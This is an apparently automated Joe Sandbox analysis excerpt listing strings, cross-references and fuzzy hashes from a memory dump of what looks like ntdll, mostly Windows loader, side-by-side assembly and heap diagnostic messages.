                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-204845295
                                                        Strings
                                                        • LdrpInitializeProcess, xrefs: 0192C6C4
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01968181, 019681F5
                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 019681E5
                                                        • Loading import redirection DLL: '%wZ', xrefs: 01968170
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0192C6C3
                                                        • LdrpInitializeImportRedirection, xrefs: 01968177, 019681EB
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-475462383
                                                        Strings
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01962180
                                                        • SXS: %s() passed the empty activation context, xrefs: 01962165
                                                        • RtlGetAssemblyStorageRoot, xrefs: 01962160, 0196219A, 019621BA
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019621BF
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01962178
                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0196219F
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                        • API String ID: 0-861424205
                                                        APIs
                                                          • Part of subcall function 01932DF0: LdrInitializeThunk.NTDLL ref: 01932DFA
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01930BA3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01930BB6
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01930D60
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01930D74
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                        • String ID:
                                                        • API String ID: 1404860816-0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                        • API String ID: 0-379654539
                                                        Strings
                                                        • LdrpInitializeProcess, xrefs: 01928422
                                                        • @, xrefs: 01928591
                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0192855E
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01928421
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1918872054
                                                        Strings
                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019621D9, 019622B1
                                                        • SXS: %s() passed the empty activation context, xrefs: 019621DE
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019622B6
                                                        • .Local, xrefs: 019228D8
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                        • API String ID: 0-1239276146
                                                        Strings
                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0196342A
                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01963456
                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01963437
                                                        • RtlDeactivateActivationContext, xrefs: 01963425, 01963432, 01963451
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                        • API String ID: 0-1245972979
                                                        Strings
                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019510AE
                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01951028
                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0195106B
                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01950FE5
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                        • API String ID: 0-1468400865
                                                        Strings
                                                        • apphelp.dll, xrefs: 01912462
                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0195A992
                                                        • LdrpDynamicShimModule, xrefs: 0195A998
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0195A9A2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-176724104
                                                        Strings
                                                        • HEAP: , xrefs: 01903264
                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0190327D
                                                        • HEAP[%wZ]: , xrefs: 01903255
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                        • API String ID: 0-617086771
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $@
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                        Strings
                                                        • LdrpCheckModule, xrefs: 0195A117
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0195A121
                                                        • Failed to allocated memory for shimmed module list, xrefs: 0195A10F
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                        Strings
                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 019682DE
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 019682E8
                                                        • Failed to reallocate the system dirs string !, xrefs: 019682D7
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                        Strings
                                                        • PreferredUILanguages, xrefs: 019AC212
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 019AC1C5
                                                        • @, xrefs: 019AC1F1
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                        Strings
                                                        • LdrpCheckRedirection, xrefs: 0197488F
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01974888
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01974899
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                        Strings
                                                        • LdrpInitializationFailure, xrefs: 019720FA
                                                        • Process initialization failed with status 0x%08lx, xrefs: 019720F3
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01972104
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: #%u
                                                        Strings
                                                        • LdrResSearchResource Exit, xrefs: 018FAA25
                                                        • LdrResSearchResource Enter, xrefs: 018FAA13
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        Strings
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$MUI
                                                        Strings
                                                        • kLsE, xrefs: 018F0540
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 018F063D
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        Strings
                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 018FA309
                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 018FA2FB
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                        Strings
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Cleanup Group$Threadpool!
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MUI
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID: 0-3916222277
                                                        • Opcode ID: 7ef25d35d1b8ea5097c44b11b5ce1887d9e43da92c5248be2b8f066df78068d6
                                                        • Instruction ID: 947aa5c44368a1980619a09811b07bb8b670656b43ef60a201e784d9309f8847
                                                        • Opcode Fuzzy Hash: 7ef25d35d1b8ea5097c44b11b5ce1887d9e43da92c5248be2b8f066df78068d6
                                                        • Instruction Fuzzy Hash: 1F918E72901609BEEF26EBA9DC44FAFBB79EF85740F100029F509A7250EB759941CB90
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: GlobalTags
                                                        • API String ID: 0-1106856819
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .mui
                                                        • API String ID: 0-1199573805
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: EXT-
                                                        • API String ID: 0-1948896318
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: BinaryHash
                                                        • API String ID: 0-2202222882
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #
                                                        • API String ID: 0-1885708031
                                                        Strings
                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0197895E
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                        • API String ID: 0-702105204
                                                        • Opcode ID: 29ece50d068da2359b72b3f6bbb2d764f95f420aafd3e623b8e35606ee0cc8bf
                                                        • Instruction ID: ed25602f5aac7f04ff040fe0d01b4131577b68f7f37966a657814bc192901bbd
                                                        • Opcode Fuzzy Hash: 29ece50d068da2359b72b3f6bbb2d764f95f420aafd3e623b8e35606ee0cc8bf
                                                        • Instruction Fuzzy Hash: 2B913631A00616CFEB26DB68C484B7EBBB5EF94B15F054869EE0DAB3C0E634D941CB51
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4ff3606fbc113cc99b2f1f30726270d932d9f0d4f49c4deda7b414387917992
                                                        • Instruction ID: 0fbdf6319f71c3f919e2a48d2dcbede7a16064c6a18e6e8270ca73a1eaa9911a
                                                        • Opcode Fuzzy Hash: b4ff3606fbc113cc99b2f1f30726270d932d9f0d4f49c4deda7b414387917992
                                                        • Instruction Fuzzy Hash: 288170B1E006169FDB29CF69D940ABEBBF9FB49701F04852EE549E7640E334D940CBA4
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction ID: a126246fa62095a70f769b7cb134e75e915ac175008634550811ccf2cb23d76b
                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction Fuzzy Hash: 6A816D71A0021A9FDF19CF99C9D0AEEBBB6AFC4311F188569D91A9B344DB34E901CB50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 948dde5b1842892515f95647df4d661745ae0152f2e698c2fd873e3ce501d6c7
                                                        • Instruction ID: 2b649b534daa6f5f68b9879efa75a4a0c3e854875b7169dd646c584ba46421e1
                                                        • Opcode Fuzzy Hash: 948dde5b1842892515f95647df4d661745ae0152f2e698c2fd873e3ce501d6c7
                                                        • Instruction Fuzzy Hash: 3F818071A00619EFDB25DFA9C880BEEBBF9FF88315F104429E55AA7254D730AC45CB60
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 37062f302d1d2361bccb0a1b7ec55df7514908e8f520baf70f24f5e7eb54d626
                                                        • Instruction ID: e5a050e149a06310a3842309fee31b984843618c77c03205da1a0a569b1dacfa
                                                        • Opcode Fuzzy Hash: 37062f302d1d2361bccb0a1b7ec55df7514908e8f520baf70f24f5e7eb54d626
                                                        • Instruction Fuzzy Hash: CA71AE75904225DFCB26CF59D890BBEBBF5FF58710F14465AE84AAB390D374A801CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 376ab039b1a4f5413767553bb8b0875323b77917564a4e1ed73655dbc8833ba4
                                                        • Instruction ID: 6eb5b3e5b2d1cc95644b734de9e8e03cd7156eafb1193253d07722bc87dec4b2
                                                        • Opcode Fuzzy Hash: 376ab039b1a4f5413767553bb8b0875323b77917564a4e1ed73655dbc8833ba4
                                                        • Instruction Fuzzy Hash: A571E570904205EFDB21CF59D954E9ABBF8FFE0301F88415AE608AF258C7B29984CF94
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd38444c988cfb831547cec0561dbbc6444795e42a20786ef377d1ad25a89577
                                                        • Instruction ID: 4f8db8e609dc6ab3039d5eb5f56ac87c28dc810ee09016f2a41c940fbb5a72ad
                                                        • Opcode Fuzzy Hash: fd38444c988cfb831547cec0561dbbc6444795e42a20786ef377d1ad25a89577
                                                        • Instruction Fuzzy Hash: 7271B3356046429FD312DF2CC488B6AB7E9FF84310F0585AAE85DCB392DB34E945CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                        • Instruction ID: fa8e7426b9d089c3f66441128b2e0f8abfc9559c1b20d6fd6997887434ba8276
                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                        • Instruction Fuzzy Hash: 6C716E71E00619AFDB11DFA9C944E9EBBB8FF88700F144569E909E7290DB34EA41CB50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4416ea326ffd1a5c9d6d565bc0faa17a58d9f0c2d1f26a3020d0d87722aad01
                                                        • Instruction ID: 257c3dfa2097f87e9ecba01d9f69a5eb9c3824c9d650e70dc99d02c8d5a93075
                                                        • Opcode Fuzzy Hash: e4416ea326ffd1a5c9d6d565bc0faa17a58d9f0c2d1f26a3020d0d87722aad01
                                                        • Instruction Fuzzy Hash: 0871E532200B01AFE732EF28C844F5ABBB6EF80725F154918E65A8F2A0D775E944CB50
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c055d682ee92a40b54f9583dd3b530a6e558745d989ada2bd5c80817459b883
                                                        • Instruction ID: 7df48f62d24042374b5aa802a30fdf170494151e5e3923164b92740eb7063c14
                                                        • Opcode Fuzzy Hash: 4c055d682ee92a40b54f9583dd3b530a6e558745d989ada2bd5c80817459b883
                                                        • Instruction Fuzzy Hash: BE81AD72A0830ACFDB28CF98D484BADB7F5BB49714F15452DDA04BB286C7749E41CB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 20ec849d092dd55102b9f9dccee1864b0f1d42a1bf7bb5c1b18d36b832c76c14
                                                        • Instruction ID: cc3e6060a347e800d3d63c09da34bb39aa8a405bef66cc0af22b3638c3f7b1d1
                                                        • Opcode Fuzzy Hash: 20ec849d092dd55102b9f9dccee1864b0f1d42a1bf7bb5c1b18d36b832c76c14
                                                        • Instruction Fuzzy Hash: 68713971E0020ABFDB16DF94C881FEEBBB8FB44750F104169E669A7290D774AA05CB91
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6b53b68787b91921284c9981f0fc82f4377c6e0ce0dcaa01b2d6a0e305b85147
                                                        • Instruction ID: c2d0f281f036da0e6238e44c6c97a286953b8cb2dbcb4968fcdf0a42f1e9bd76
                                                        • Opcode Fuzzy Hash: 6b53b68787b91921284c9981f0fc82f4377c6e0ce0dcaa01b2d6a0e305b85147
                                                        • Instruction Fuzzy Hash: F951D072504712AFD722DE68C844E5BBBECEBC5B50F410929BA88DB150D770ED08CBE2
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aca0b2b42f40034ef5b75bd5e21a7eb11aa82bb668f4fde35beb299fb11a4211
                                                        • Instruction ID: ad7c2586487cf3b7dfd457b9dbb789465a4ea77ff6e6f4b20989f96780ec922d
                                                        • Opcode Fuzzy Hash: aca0b2b42f40034ef5b75bd5e21a7eb11aa82bb668f4fde35beb299fb11a4211
                                                        • Instruction Fuzzy Hash: 8F51B270900709EFDB21DF5AC884AABFBF8BF95710F104A1ED29A976A0D770A545CB90
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dac127f92c29593b5d095aeabde994a680172c1ca18e75b119f8849f0af65540
                                                        • Instruction ID: fe5077f527045d5f7221007ef4d3d14cf59e2e7e0df1242ee76f08a2a9728ef3
                                                        • Opcode Fuzzy Hash: dac127f92c29593b5d095aeabde994a680172c1ca18e75b119f8849f0af65540
                                                        • Instruction Fuzzy Hash: E2515B71610A25DFCB22EF69C9C0E6AB3FDFF54644F41086AE949D7260D734EA40CB60
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 839ea10c2b3c92a3a12800a865f4f3912283b2d21cf094870111870696b4c9c5
                                                        • Instruction ID: cedb373a07334199ecf4d55be4983d26a902f8cdd828b7c1a4808254b4a314d4
                                                        • Opcode Fuzzy Hash: 839ea10c2b3c92a3a12800a865f4f3912283b2d21cf094870111870696b4c9c5
                                                        • Instruction Fuzzy Hash: 7B516A716083069FDB55DF2DCA82A6BB7E9BFC8208F44492DF589C7250E730D906CB92
                                                        Memory Dump Source
                                                        • Source File: 00000003.00000002.2136699590.00000000018C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_3_2_18c0000_03.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                        • Instruction ID: baa3edbb931721599e9c82261db86cb9389061b7e02d43d4b6823506f2ce2a32
                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                        • Instruction Fuzzy Hash: 56519271E0021EAFDF16DF94C440BEEBBB9AF89754F054069EA09AB254D734DD84CBA0
                                                        Memory Dump Source
